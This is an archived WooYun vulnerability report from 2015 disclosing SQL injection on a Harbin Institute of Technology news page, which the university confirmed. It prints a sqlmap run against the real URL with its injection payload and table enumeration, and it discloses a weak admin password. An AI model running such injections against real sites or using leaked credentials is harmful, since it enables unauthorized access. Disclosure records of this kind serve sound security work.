当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139931

漏洞标题:哈尔滨工业大学某站存在SQL注射漏洞

相关厂商:哈尔滨工业大学

漏洞作者: pandatv

提交时间:2015-09-09 14:06

修复时间:2015-10-24 17:24

公开时间:2015-10-24 17:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-09: 细节已通知厂商并且等待厂商处理中
2015-09-09: 厂商已经确认,细节仅向厂商公开
2015-09-19: 细节向核心白帽子及相关领域专家公开
2015-09-29: 细节向普通白帽子公开
2015-10-09: 细节向实习白帽子公开
2015-10-24: 细节向公众公开

简要描述:

该站存在SQL注射,后台弱口令,可拿shell

详细说明:

rt

漏洞证明:

http://iac.hit.edu.cn/ReadNews.asp?NewsID=1138&BigClassID=6&SmallClassID=10
root@kailtest:~# sqlmap -u "iac.hit.edu.cn/ReadNews.asp?NewsID=1138&BigClassID=6&SmallClassID=10" --tables
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150813}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 01:10:30
[01:10:30] [INFO] resuming back-end DBMS 'microsoft access'
[01:10:30] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: NewsID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: NewsID=1138 AND 6876=6876&BigClassID=6&SmallClassID=10
---
[01:10:32] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[01:10:32] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[01:10:32] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[01:10:32] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[01:10:32] [INFO] retrieved:
[01:10:32] [INFO] heuristics detected web page charset 'GB2312'
[01:10:33] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[01:10:33] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[01:10:33] [ERROR] cannot retrieve table names, back-end DBMS is Access
do you want to use common table existence check? [Y/n/q] y
[01:10:35] [INFO] checking table existence using items from '/usr/share/sqlmap/txt/common-tables.txt'
[01:10:35] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 9
[01:10:37] [INFO] starting 9 threads
[01:10:42] [INFO] retrieved: admin
[01:10:44] [INFO] retrieved: news

QQ图片20150909131938.png


后台弱口令 admin iac

QQ图片20150909133951.png


修复方案:

rt

版权声明:转载请注明来源 pandatv@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2015-09-09 17:22

厂商回复:

十分感谢

最新状态:

暂无